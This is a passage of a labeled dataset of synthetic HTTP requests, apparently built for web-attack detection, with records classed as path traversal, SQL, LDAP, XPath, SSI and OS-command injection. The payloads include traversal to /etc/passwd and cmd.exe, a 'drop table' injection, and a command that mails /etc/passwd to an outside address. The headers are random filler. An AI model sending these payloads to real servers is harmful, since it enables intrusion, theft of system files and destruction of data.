Upgrade: NNutal/3.3, Zdxhh/3.9
Warning: 142 198.194.142.50 "nwxrb2ahoh62t06" 
X-Forwarded-For: 36.143.183.170
X-Serial-Number: 49725305842038917
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46681
Start - Id: 46365
class: PathTransversal
GET /rdetoEel7BlsrcfmnBe/K0xD/EhtrTso/ep8KrDkwHCmidQoifF/tWFAzmDIEPZeCMkM/rnweeaPhfh/svPv6V_Z@lGa.cgi?cpsn8pue=raqkfdoh&mnqttu=5864&qoke7weiBeil=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&ysrR=sarelrhskep8sgeu3&iotipzoeeso=9413538599 HTTP/1.1
Host: 78.26.18.228:3
Connection: keep-alive
Accept: text/html;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rElrigt-eeuwctha;q=0.0
Cache-Control: Tuoed4i='dla'
Client-ip: 214.183.248.166
Cookie: g2=dwartbnaekls;7Sh64WF8rd=697577689
Cookie2: $Version="64"
Date: Mon, 13 Nov 06 12:23:03 CET
ETag: W/"O6CVj03f@WFfucmV6x"
Expect: aitsn
From: cewts@1fgr.fr
If-Modified-Since: Thu, 19 Jun 08 14:25:17 GMT
If-Unmodified-Since: Wed, 06 Aug 08 11:44:01 UTC
If-Match: "c1IzCSR.5lgREbk.Y"
If-None-Match: "lous4WLlncNNBsyUDhP"
If-Range: "wlMQDJIc7@rO471MKTgF"
Max-Forwards: 873
MIME-Version: 1.9
Pragma: blaybao=o3ucr
Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: ggeO ihqzp=etqEih
Range: 405245-17797
Referer: /prDdes/roos0e.mp3
TE: trailers,deflate
Trailer: Expect
User-Agent: Mozilla/3.9 (Windows; U; Win 9x 2.1; 1j-lH; rv:5.4.6) Gecko/46411026
UA-CPU: StrongARM
UA-Color: color32
UA-Pixels: 648x2225
Via: FTP/5.0 www.ekEdy.png, HTTP/1.8 www.Kawrss.css, 3.5 www.nrdeC9n.shtml
Transfer-Encoding: deflate
Upgrade: tarad/0.1, sawaj/0.5, aeLes/2.3
Warning: 298 47.169.61.113 "pr6idci4mnm8" "Fri, 15 May 09 02:27:43 UTC"
X-Forwarded-For: 241.79.66.180
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46365
Start - Id: 38823
class: LdapInjection
GET /Anepsifrnhremldjh/ndw6tluedante8ryngtt.htm?n8r2asjhs0=tando&vignwV=64%29%28%26%28objectClass%3Duoyd%29%28%7C%28sn++%3D++++cC%29%28cn%3Dr+J*%29%29&bnysdocs61=xp_hEnysrvttutR&sc11Er1ore=tHNmh&aqTaitc=Rrcneefoqvarn HTTP/1.1
Host: 71.174.210.246
Connection: hoye
Accept: application/x-tar
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: ooete-hlr1hg;q=0.0, 5n1eli-Ohm8cmg5;q=0.6, eho-nwonoo;q=0.4, fESs-o
Cache-Control: max-stale=5
Client-ip: 166.96.232.49
Cookie: snevOhqnc0wm=itHirhsrahttpseui;3nhoc65by=hn2YgII;Umt=7439213969;irlpm8tcIcptrpr=dzo4;lfshixa=1ltd ERk 
Cookie2: $Version="689"
Date: Mon, 05 Oct 09 11:33:51 UTC
ETag: "cFY6YafTK7wsO_G-E90N"
Expect: 100-continue
From: hth4s@nafohliad.be
If-Modified-Since: Sat, 21 Oct 06 04:21:44 CET
If-Unmodified-Since: Sat, 15 Dec 07 06:25:36 CET
If-Match: "jYqxnf8M4URpDXaXfYaP"
If-None-Match: *
If-Range: Thu, 25 Jan 07 09:04:49 UTC
Max-Forwards: 38
MIME-Version: 4.6
Pragma: evEub='ySilkj'
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: Digest algorithm=MD5
Range: 55524-
Referer: /i1wotesO/6es03s.cfm
TE: trailers,trailers
Trailer: Via
User-Agent: ttoio2trb9 (elyljFg3AW; gUfg.NXD)
UA-CPU: MIPS
UA-Disp: 0767,501,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: FTP/6.2 www.iAlood.png
Transfer-Encoding: compress
Upgrade: wnz/1.4, E79wa/9.8, 1dvs/2.3
Warning: 659 www.rhdhc.htm "uoftereRIuwgtWj" "Wed, 06 Aug 08 14:08:03 CET"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38823
Start - Id: 37764
class: LdapInjection
GET /nJHbWCm4WgZ1VBCeJVC/aL@Sl@AzunionxYTzgw/34gH6xtl/n5_/Ofksiien6o/5Ae2UdrgriiOzwibo/0naymonxEedhhndweob2/16RR6Cj0wV32Wv/a2p.jpeg?honisaecfbat4=%29+%28++%7C+++%28displayName%3Dhad*%29+%28name+%3D+had*+%29%28+mail%3Dhad*++++%29 HTTP/1.0
Host: 246.181.17.223
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 28.9.182.133
Cookie: cttndu4os5oa=livar5tac;es=aztn;fsrYteTd=20434063
Cookie2: $Version="37"
Date: Sat, 26 Apr 08 22:56:38 GMT
ETag: "obHqz4OzX93Svrt6nEXA"
Expect: atsAq
From: fssGmo@tsxudTxl.fr
If-Modified-Since: Wed, 16 Feb 05 09:51:41 UTC
If-Unmodified-Since: Sat, 04 Sep 04 03:55:11 CET
If-Match: *
If-None-Match: "HAyqQsnnBVhH0bHT"
If-Range: Tue, 27 Jan 09 11:38:15 UTC
Max-Forwards: 3
MIME-Version: 6.5
Pragma: tqwAe=3ym5uotx
Proxy-Authorization: Basic MzRvbG86dGVzU3hhbmQ=
Authorization: Digest opaque="maud"
Range: 059-52057,02-0322
Referer: /etneo/gtlhisf.gif
TE: deflate,trailers
Trailer: From
User-Agent: mllibsnT/5.3
UA-CPU: x86
UA-Disp: 3833,663,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 807x162
Via: 4.2 www.qeeaeac.jpeg:6
Transfer-Encoding: 5naO; rsx93jn=gmndN
Upgrade: si0/4.3, ewgHho/5.9, yibiRd/8.8, ahmafn/5.3
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 195.192.117.214
X-Serial-Number: 7486160267274211008
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 37764
Start - Id: 44243
class: OsCommanding
GET /PBServer/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0 HTTP/1.0
Host: 244.253.213.87
Connection: er72
Accept: audio/basic;q=0.8, image/*, audio/x-wav;q=0.1
Accept-Charset: iso-2022-kr, x-mac-roman;q=0.4, x-mac-hebrew
Accept-Encoding: deflate;q=0.3, compress;q=0.6, identity, gzip;q=0.5
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 157.29.164.15
Cookie: Hdympite=seeHrea0tY;geCmte=fet6 oi;6SaurtedzisEcte=88862;6.gTlBufO=n6  $lntttctmp;rRF3bir3sspeane=tfttiswherec;acsias=n1Jkty
Cookie2: $Version="9"
Date: Wed, 07 Sep 05 23:48:24 UTC
ETag: "-8T0kbq_jilGiD3"
Expect: ohder2=drntNg
From: ided@udhoes.uk
If-Modified-Since: Sun, 17 Aug 08 20:36:54 CET
If-Unmodified-Since: Mon, 07 Mar 05 11:34:53 CET
If-Match: *
If-None-Match: "nHqelmTAXyPEbWth"
If-Range: Fri, 02 Nov 07 05:13:07 UTC
Max-Forwards: 339
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic aHRybng6ZWxMYQ==
Authorization: Digest nonce
Range: 9-
Referer: /meameti/RtethwU1/rhnsrMe7/aotaAho.asp
TE: trailers
Trailer: Accept
User-Agent: dgertps (syecmtmTk; sctZt1ySB; avy8Uh5h69; hk3ewjX; tQddPFJc)
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 352x848
Via: HTTP/4.1 104.245.120.13, HTTP/2.1 245.174.241.3:8
Transfer-Encoding: compress
Upgrade: 0sp/8.6, gthorA/5.1, rolgoc/8.9, ueeiT/5.3, ylot/4.6
Warning: 992 www.i1e3itee.jpg "capc8tz" 
X-Forwarded-For: 242.235.213.130
X-Serial-Number: 87791101469123011682
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44243
Start - Id: 39703
class: SSI
GET /toqG/iBIBSvBX/bQ@qhhq8fCFFi5cf/emaD4Po--9WrUC9eL/oSTpc7Dj/jzJz.shtml?caoiHd1sguLMnmf=erdncldN%3F+5si%2Bdstls&v71seK=6tnoa&io=unye&tttiyeht9fninm3=+p&d8nDa0nGonzb=ixEJHGlfdV_S&itteeeseaefgue=726371363&360serviceslog=%3C%21--+++%23include++virtual%3D%22%2Fetc%2Fpasswd%22+++++--%3E&4hieaet=47&q6location7FSez=d.IV HTTP/1.0
Host: www.uui2h7a.net
Connection: keep-alive
Accept: application/rtf;q=0.0, image/gif, text/*
Accept-Charset: iso-8859-6;q=0.7, iso-8859-8
Accept-Encoding: 
Accept-Language: ila-nrssAan, ehw5i4h5-rwieen;q=0.0, t-uiotdt;q=0.2, ue-ATeGsrb;q=0.0, qYtoos-evbuct
Cache-Control: only-if-cached
Client-ip: 120.48.93.141
Cookie: pe=ss;rf6k2e0uuhgwtpv=ebo;saea72IoTw=rrS;fliurshaN9exg=2tabdHTam0tf4wov7g
Cookie2: $Version="4"
Date: Sat, 13 Jun 09 21:02:49 UTC
ETag: "U0JnnPHBGTG9WCy"
Expect: 100-continue
From: dOrrrspe@5lmtas.st
If-Modified-Since: Fri, 29 Apr 05 15:34:22 CET
If-Unmodified-Since: Tue, 27 Jan 04 19:43:28 UTC
If-Match: "0HXU9vo7gOStV6lt"
If-None-Match: "nPT6c8aTTnrw7xfHZv"
If-Range: Sun, 20 Aug 06 02:45:23 UTC
Max-Forwards: 2
MIME-Version: 7.2
Pragma: tt1pi=ia
Proxy-Authorization: mE1df gdtrmo=oh1esyls
Authorization: Basic cm5mYWVPYW86bmdlbA==
Range: 61-,98874-5,222224-
Referer: http://eAtrd.st/Haohnex/dcnw.asp
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/2.1 (compatible; MSIE 1.0; SunOS sun4u; yzsag)
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 726x074
Via: HTTP/5.2 112.213.126.132:122, Aecwe/5.7 5.217.236.76, 9.2 www.MEaiimT.jpg
Transfer-Encoding: compress
Upgrade: im0/0.0, gln/3.7
Warning: 081 www.8wna8.jpg:64 "othhe5UTHRpeH" "Tue, 13 Jun 06 09:06:37 CET"
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39703
Start - Id: 36441
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 167.108.252.214:80
Connection: keep-alive
Accept: image/*, image/*
Accept-Charset: windows-1257;q=0.3, windows-1253;q=0.4
Accept-Encoding: *
Accept-Language: i7-sid, yr1dj-f, htgdel-i;q=0.7, AtNrcn5-mnaiyn
Cache-Control: no-transform
Client-ip: 107.177.36.98
Cookie: cdsef=processing-instruction
Cookie2: $Version="10"
Date: Mon, 10 May 04 18:26:38 UTC
ETag: W/"u4HtIBSrU_SJ2Q3p6Q"
Expect: ajatsei7=hn7Hs
From: ghijiO@Fsrajafric.com
If-Modified-Since: Tue, 03 Jan 06 20:32:04 CET
If-Unmodified-Since: Sat, 28 May 05 14:28:11 CET
If-Match: "mi@C7yLIBzB2NlqZp"
If-None-Match: "Wih6zCLb5RAQVlldUOW"
If-Range: "J1sRG1ni.K6tcorw"
Max-Forwards: 4
MIME-Version: 0.7
Pragma: c2fqred=Ddnj
Authorization: esyEx nttyicer=syse
Range: 18-43314
Referer: /aBesa.swf
TE: deflate,trailers,chunked;q=0.8
Trailer: Trailer
User-Agent: Mozilla/6.4 (Machintosh; U; PPC Mac OS X 7.5; ti-jd; rv:1.6.4) Gecko/68768002
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-Color: color32
UA-Pixels: 006x6469
Via: 4.7 139.110.166.82
Transfer-Encoding: gzip
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 92.128.39.126

null

End - Id: 36441
Start - Id: 41832
class: SqlInjection
GET /liEv/vd1HUz@7@Y9fUY/BG@daVfApositionaccept/uwut8M8aiz9hbrde2/arJZjo/P58NWWOservicesM6txvx/urhizncln1hxdpn2vh/sz6bafterotrLrDlfeme.png?oErcwhg0eest=iamsam8&a4sEpn=%27%3Bdrop+table++++msNyZeejn&CehlT1Roldce=813&lnuftihvf=48833072 HTTP/1.1
Host: www.hsr4h.fr
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 196.90.56.27
Cookie: H1uASvO=5658170;otbginddm7es=4;autoexecLRIIP3winntmail=nY8JU;DgfQk1n5a=8404
Cookie2: $Version="58"
Date: Sat, 22 Mar 08 22:37:51 UTC
ETag: W/"sEO6-Hh4WcNew12P"
Expect: 3hnAo
From: wIdO@lerc.gov
If-Modified-Since: Tue, 20 Dec 05 08:55:46 GMT
If-Unmodified-Since: Sun, 14 Mar 10 16:37:45 UTC
If-Match: "uksNWcbA@zsg4cd"
If-None-Match: "s3oQO.K0pDBrHcoMoKeU"
If-Range: Fri, 14 May 04 23:16:24 CET
Max-Forwards: 54
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM ZDhzdGFlcmRSaGlvNXR5aW9tMHFkU3JpY2VpaXV5ZW56Y2Rsbw==
Authorization: NTLM dDBtTDh5Z2hyQmFibWlzZWxzYmF0T3lkYXhweW5yb2k0Yg==
Range: -0842
Referer: http://www.ttsizE8I.it/ywaAwtl/akbthga/nla86/de5saesn/gz6sdk.mdb
TE: deflate;q=0.0
Trailer: Max-Forwards
User-Agent: Mozilla/6.4 (Windows; U; Windows NT 5.8; Aa-a9; rv:4.7.6) Gecko/74142091
UA-CPU: StrongARM
UA-Disp: 0572,127,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5914x483
Via: HTTP/1.6 www.o2o2rtes.gif, 0.4 61.159.11.145
Transfer-Encoding: gzip
Upgrade: 7r8/5.9, eevr/0.1, escfA/5.5, itqIta/3.3
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 80.139.161.110
X-Serial-Number: 431124702375
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41832
Start - Id: 49347
class: XPathInjection
GET /SIt/mStnadrrbadtdhf/OA4Oy8vkQsystem/yTB5dEXNn-YR/3w4gz/toadiIaar.php?r0tF=3+++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+6295%3D&norgs=8172&tgrcI=6CCJL1DuRXm&strb=ulB HTTP/1.1
Host: www.ar2etniCJ.it
Connection: close
Accept: */*;q=0.5
Accept-Charset: windows-1250;q=0.7, windows-1251;q=0.4, cp-950;q=0.5, windows-1254;q=0.1
Accept-Encoding: identity, identity, compress
Accept-Language: mt5s-sb2t;q=0.2, oro-2gF;q=0.0, sd-oSttle, o-sTrnzCI;q=0.0, oia2deu-ne
Cache-Control: no-transform
Client-ip: 144.73.134.163
Cookie: aRoahifymyIBer=642922667
Cookie2: $Version="415"
Date: Sat, 11 Oct 08 18:51:46 UTC
ETag: W/"5SJ1rsuHDeMmiBuju"
Expect: nteo1rm=hlxEErme
From: tbcbeeti@dlnmnmt.be
If-Modified-Since: Fri, 13 Feb 04 15:52:28 UTC
If-Unmodified-Since: Mon, 08 Jan 07 05:12:31 CET
If-Match: "epaBLMRE1Y4GzxZKArzw"
If-None-Match: "s4JD3HVD3q6xRtR"
If-Range: "uXLagBPd6tx@WL.hE"
Max-Forwards: 392
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM ZWxpanNqcm1TNm5JaWRyTHI4aHNobzNtVHZsdHRhb2Y4b3Jz
Authorization: paIta yEnolhc=1srhn
Range: 50519-,-46393
Referer: http://www.xpreth7.org/oerdt/lDRttgzO/7srAsle/totl/h1er7qc.bin
TE: deflate,gzip
Trailer: Upgrade
User-Agent: ins6mtc/1.1.8
UA-CPU: StrongARM
UA-Disp: 5653,956,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 953x2070
Via: 4.7 www.crzE.shtml, FTP/2.6 www.suxz.js
Transfer-Encoding: gzip
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 168 180.56.143.92 "19ohloeeIes" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 5083786
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49347
Start - Id: 41878
class: SqlInjection
GET /awoe2nnRdde78nntvid/nd0xwjVxnZzfvMmFNZ/aw_CF6V1fgHnv/hgsweslteBueg0/oDTF3vrW7Yz_keA.lLT/hivFrBP2Uqry/4tweU0sunesato/DqQBE1/eanhehgNg9magyoiLt/hfn7aiihslhatknandg.html?lalNyUsc=OR+++%279cT%27+++++%3D++%27++%27 HTTP/1.0
Host: 14.165.245.214
Connection: keep-alive
Accept: application/*, video/mpeg, application/*;q=0.0
Accept-Charset: iso-8859-15;q=0.2, x-mac-korean
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 203.18.145.66
Cookie: rsyoasinsmnaa4=b
Cookie2: $Version="01"
Date: Mon, 03 Apr 06 09:48:19 GMT
ETag: "GIV9P1vm4tob1Uo"
Expect: estmtade=iia9d
From: uims2c@rtXh1sbi2a.cz
If-Modified-Since: Tue, 31 May 05 05:38:45 GMT
If-Unmodified-Since: Fri, 23 Sep 05 05:05:41 UTC
If-Match: "RZeWUmEl@SmE-rH-sp"
If-None-Match: *
If-Range: Mon, 01 Nov 04 08:58:29 CET
Max-Forwards: 99
MIME-Version: 0.4
Pragma: Ec1=n
Proxy-Authorization: NTLM aG91bjd0ZWhzYWRkcmh3ZW95YzA2YWNocnJldHFhbHNub3VhYXdlZGl0M2xyOTE=
Authorization: Basic b2VlZ3c6bmFuSGF6
Range: 2764-93323,17883-91
Referer: http://www.powfS4.ch/c7ah1emh/nase/8z3e/3ah7nzn.asmx
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/1.4 (X11; U; Solaris 1.6; df-b1; rv:6.4.6) Gecko/25211794
UA-CPU: StrongARM
UA-Disp: 9347,2639,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 044x365
Via: 2.0 63.242.122.3, FTP/9.8 www.nlhd.jpg
Transfer-Encoding: deflate
Upgrade: 4sh/4.2, Rdhtih/8.1
Warning: 128 www.e6Otm9gi.js:6 "9Ernr" "Fri, 18 Jul 08 20:57:39 GMT"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41878
Start - Id: 43007
class: OsCommanding
PUT /3oete3eeogegiit/sWntDtI2K1Q_z.htm? HTTP/1.1
Content-Length: 196
Content-Language: rqwsC,eirqsyOr,enFil
Content-Encoding: compress
Content-Location: http://www.fkHtcrs.cz/eiiose6/otisr01e.msf
Content-MD5: U2VuYTZuaWVwbHJvbmJubg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 May 05 24:35:16 CET
Last-Modified: Thu, 13 May 04 03:42:12 UTC
Host: 54.252.229.185
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-chinesetrad;q=0.1, x-mac-arabic, windows-1254;q=0.1, windows-1257, euc-kr
Accept-Encoding: deflate;q=0.3
Accept-Language: *;q=0.3
Cache-Control: eoj='pLrysi'
Client-ip: 110.134.30.79
Cookie: I2P.aT3=0135233;me=ltlRiv
Cookie2: $Version="63"
Date: Fri, 03 Apr 09 20:44:19 CET
ETag: W/"0NBLX.RBY-fBb-s"
Expect: 100-continue
From: odyrata@nanebCh8fa.gov
If-Modified-Since: Wed, 15 Dec 04 11:44:17 CET
If-Unmodified-Since: Mon, 29 Aug 05 21:03:53 GMT
If-Match: "iz69ZTYIHRGVfeWaYak_"
If-None-Match: *
If-Range: "fk1eHdbuHvq1Lo5ov"
Max-Forwards: 1164
Pragma: I=e9
Authorization: NTLM b3Nzd2hhcmlhbnRrNzhlc2lQM2lFczJzZWxyc3RueHNsd2VJdg==
Referer: /bebel4/wbswi/lvyedte/mitt4b.swf
TE: deflate,deflate;q=0.1,deflate;q=0.3
Trailer: Proxy-Authorization
User-Agent: sw8V1g http://www.lygwhf.it
UA-Pixels: 2695x320
Via: FTP/0.9 www.qean.css, 0.7 199.159.7.206
Transfer-Encoding: 1dynle; ehrnen=xcniebg
Upgrade: e5edij/1.7, tveoee/4.3
Warning: 863 www.t8fst5.js:4942 "iaa8uceowT1aeejsueoy" "Mon, 03 Nov 08 04:48:51 UTC"
X-Forwarded-For: 225.212.15.105
----: ------------------------------------------------

FslotnUriioE= itC7&vd8enhwetepssn=aedt=boqbn1&hya6hhp=6908&pcutev3snfoA=oops;cat   /etc/passwd    |    mail     your@kezh.com&hVrj..2A.qyn=qRaH9BF_kw&g1ieupteey=8&can5iyae150n4i=125219

End - Id: 43007
Start - Id: 49293
class: XPathInjection
GET /62Zcz.E3NmIZEH@/hP5At.C2t_g/g2HIDXn/yQYfWZTLAT/1gkA-H/SroUes/t5scaaOsmtv/processing-instructionpGzkOt0d/hWHiZWXdr-x3_xBuLW.jpeg?hezitihyod=li6%27+++or++6++++%3C+++count%28path%2Fchild%3A%3A*%29++++or+++++%27ioyeno2n%27+%3D%27&Nm=2516&qFV-9-php6RE=tn7l&ese=a%3Eo+%3Do%26noem%40yE9&eac=84717580&nRan=t%3Fi%40hmnu&ksrofssr=adhdnhnijn4ke&oneh=car+mo+eP%29ps%5C%24e%40i HTTP/1.0
Host: www.rfwhmtn.be
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 4.136.188.242
Cookie: oann7An3=olue5Tieiaoin;cIeg=l52yKX53;reeIt=67318503;tt7syi=vliavo;nahEon5f=06;tpeSFhbeauxmno=Ot
Cookie2: $Version="213"
Date: Tue, 06 Jun 06 02:41:43 UTC
ETag: "kip5j5ec5RFhUSVhtKck"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Fri, 07 Mar 08 16:40:00 CET
If-Unmodified-Since: Tue, 28 Feb 06 13:38:23 UTC
If-Match: "h.EAPtYo7V.8JSq0r"
If-None-Match: "Tv_8_QwBhSU1limYRq8"
If-Range: *
Max-Forwards: 786
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: OmthsX Nttea6=9rlenb
Range: 86-1461,597962-028810
Referer: http://www.1rte2a.uk/iudettve/ot1sh5vm/geLi9d.asmx
TE: chunked;q=0.3
Trailer: Trailer
User-Agent: ertcir/9.4.1.1
UA-CPU: Sparc
UA-Disp: 284,977,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7516x496
Via: 6.5 www.hdsrTc.png
Transfer-Encoding: compress
Upgrade: kefEa/0.4, sicxsn/0.6, oeAol/1.0, tMesla/8.7
Warning: 172 140.116.163.38:5 "oRfa" 
X-Forwarded-For: 137.94.37.177
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49293
Start - Id: 41760
class: SqlInjection
GET /2re/eTSiMmQdb0eS.6u/rXe026fNWR/enehodn/etIieo8elrsl/gXqu-.NE/evos/srithlu3Su.mdb?a7=8x%4082eRZ&lrputaofh02ch5t=%27select+++++customer_phone+++++%27%7C%7C%27from++++customers++%27%7C%7C%27where+customer_surname%3D%27%27%27%7C%7C+++lv_surname%7C%7C%27%27%27+++++and++++customer_type%3D1%27%3B&rhaatnledsrmn=etcusr HTTP/1.0
Host: 6.171.35.203:1552
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-2022-kr;q=0.6, iso-8859-9;q=0.9, koi8
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 122.67.58.101
Cookie: r9shi=46699;3KB7CI1u=xdOS;icteloh=15868661;jy1VsamC8pcmdrstdinH=942158;yd6tr6An5ra5=664038
Cookie2: $Version="99"
Date: Mon, 09 Nov 09 01:36:44 CET
ETag: "xdRpcd80difxy7zp-Wn"
Expect: osevnd
From: lehFo@eioiwni.cz
If-Modified-Since: Tue, 17 Mar 09 11:22:27 CET
If-Unmodified-Since: Mon, 24 Jul 06 04:52:30 UTC
If-Match: "gDP@ZAnsleJxq6xth8"
If-None-Match: *
If-Range: *
Max-Forwards: 8488
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Basic c0F0b3k6ZW4wbm9vdG0=
Authorization: Basic ZWFxYXRzczpibnJ6bGVvbw==
Range: 4234-490888,-164882
Referer: http://eh0ae.uk/sfrS.exe
TE: gzip;q=0.9
Trailer: Cache-Control
User-Agent: KeAir6cor0/4.4.7.3
UA-CPU: 68000
UA-Disp: 9710,8359,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 9206x518
Via: 1.9 65.212.198.44:49484, FTP/9.6 204.103.111.215, 0.8 45.66.246.243
Transfer-Encoding: deflate
Upgrade: 0rei4d/2.0, titan/4.1, nsj/8.7, ngq/4.4
Warning: 163 www.nra9ood.tiff "0tlethihaeg4hbi" 
X-Forwarded-For: 140.12.238.50
X-Serial-Number: 81915611891
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41760
Start - Id: 40376
class: SSI
GET /gpd/ibinQNeq/fiaeaelelnFtetbT/6AE6/w2r/i1hDAt0V.alTr.shtml? HTTP/1.1
Host: 49.43.166.95:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 163.245.81.254
Cookie: eoleto=5609079;idTEj=42296;teMirl=<!--  #include    virtual="d:\windows\autoexec.bat"   -->
Cookie2: $Version="768"
Date: Sat, 25 Dec 04 01:07:02 GMT
ETag: "yO_v3bLbN0KCSkvJdCl"
Expect: 100-continue
If-Modified-Since: Sun, 18 Dec 05 22:03:24 UTC
If-Unmodified-Since: Tue, 13 Apr 04 13:56:47 UTC
If-Match: "L2lzIjgoSCz-9-oU1u"
If-None-Match: "zfTRyrXwXWagqpoMWO2Q"
If-Range: "eu14.Lzu-IjOvoKFs1AB"
Max-Forwards: 1
Authorization: NTLM ZXMzcmVpbnRFbjIyb2txVVVhUmZFc2V5ZTJzT3Zuc2VkZzY=
Referer: http://eott.de/riieif.swf
TE: gzip;q=0.0,trailers,trailers
User-Agent: Mozilla/4.3 (Windows; U; Windows NT 7.7; te-to; rv:4.3.7) Gecko/12303338
UA-Disp: 1230,8979,32
Via: 0.4 227.100.67.254, 4.4 164.38.20.15, HTTP/4.3 119.190.112.86:60551
Transfer-Encoding: glqs
X-Forwarded-For: 167.91.249.90

null

End - Id: 40376
Start - Id: 42606
class: SqlInjection
GET /k@SH5bjbRF2.8MGa0yu@/duahltnu/hi/2xer2hsatlai/sioeptoeix2/ogn8oescH/wRllrsekeietAd/5M.m9x.Z9g9eWcz.png?tkqoa7juadru0=%27+++%29+++++UNION+++ALL++SELECT+++3++++FROM++nmlcnl++WHERE++++%28++++%27%27++%3D++%27&eerkcs=6iwinehl HTTP/1.0
Host: 117.217.172.15
Connection: close
Accept: video/quicktime;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ea-hajw
Cache-Control: max-stale
Client-ip: 30.185.17.82
Cookie: wt29fi6mOt9leel=tYlVR;xasnx=7
Cookie2: $Version="641"
Date: Fri, 23 May 08 17:07:00 CET
ETag: W/"dDx574vQD5EHg8r83RQ"
Expect: r9g3sbl=nvita
From: Ttm5ttN@Sin1.net
If-Modified-Since: Tue, 23 Mar 04 21:40:43 UTC
If-Unmodified-Since: Mon, 29 Oct 07 18:54:04 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Jun 04 03:46:25 UTC
Max-Forwards: 29
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM c3N3OW9zaW9haGFkbnNpaWdvYWRFcnBzb2MzZXNvaW5paDdlbnJQ
Referer: http://91nei3.fr/tewg.pl
TE: gzip
Trailer: Warning
User-Agent: Mozilla/0.3 (Machintosh; U; PPC 2.1; ye-ri; rv:6.3.3) Gecko/56420624
UA-CPU: PowerPC
